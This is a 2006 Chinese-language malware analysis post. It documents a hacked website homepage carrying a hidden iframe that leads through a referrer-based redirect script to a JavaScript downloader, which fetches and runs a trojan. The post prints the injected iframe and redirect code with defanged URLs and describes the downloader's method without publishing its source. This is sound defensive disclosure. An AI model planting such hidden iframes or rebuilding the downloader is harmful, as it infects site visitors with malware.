endurer 原创
2006-08-21 第1版
网站首页插入如下代码:
/------------
<iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe>
------------/
hxxp://www.ac***66.cn/8***8/index.htm 的内容为:
/--------
<SCRIPT language="JavaScript">
function cameFrom(where) {
if (!document.referrer && !where) return true;
else return (document.referrer.indexOf(where)>=0)
}
if (cameFrom("nen.com.cn")) {
location.replace("3721.htm");
}
else if (cameFrom("gov")) {
location.replace("3721.htm");
}
else if (cameFrom("or")) {
location.replace("3721.htm");
}
else if (cameFrom("bi")) {
location.replace("3721.htm");
}
else if (cameFrom("1488.com")) {
location.replace("3721.htm");
}
else {
location.replace("mm.htm");
}
</SCRIPT>
--------/
hxxp://www.ac***66.cn/8***8/mm.htm 的内容为:
/--------
<iframe src="hxxp://www.ac***66.cn/8***8/joke.htm" width="0" height="0" frameborder="0"></iframe>
<script src='hxxp://s**59.cnzz.com/stat.php?id=230393&web_id=230393&show=pic' language='JavaScript' charset='gb2312'></script>
--------/
hxxp://www.ac***66.cn/8***8/joke.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。
该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.ac***66.cn/8***8/rpp.exe, 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫 中第二段脚本程序相似)
g0ld.com Kaspersky 报为 Trojan-Downloader.Win32.Delf.asb,瑞星报为 Trojan.DL.Delf.csh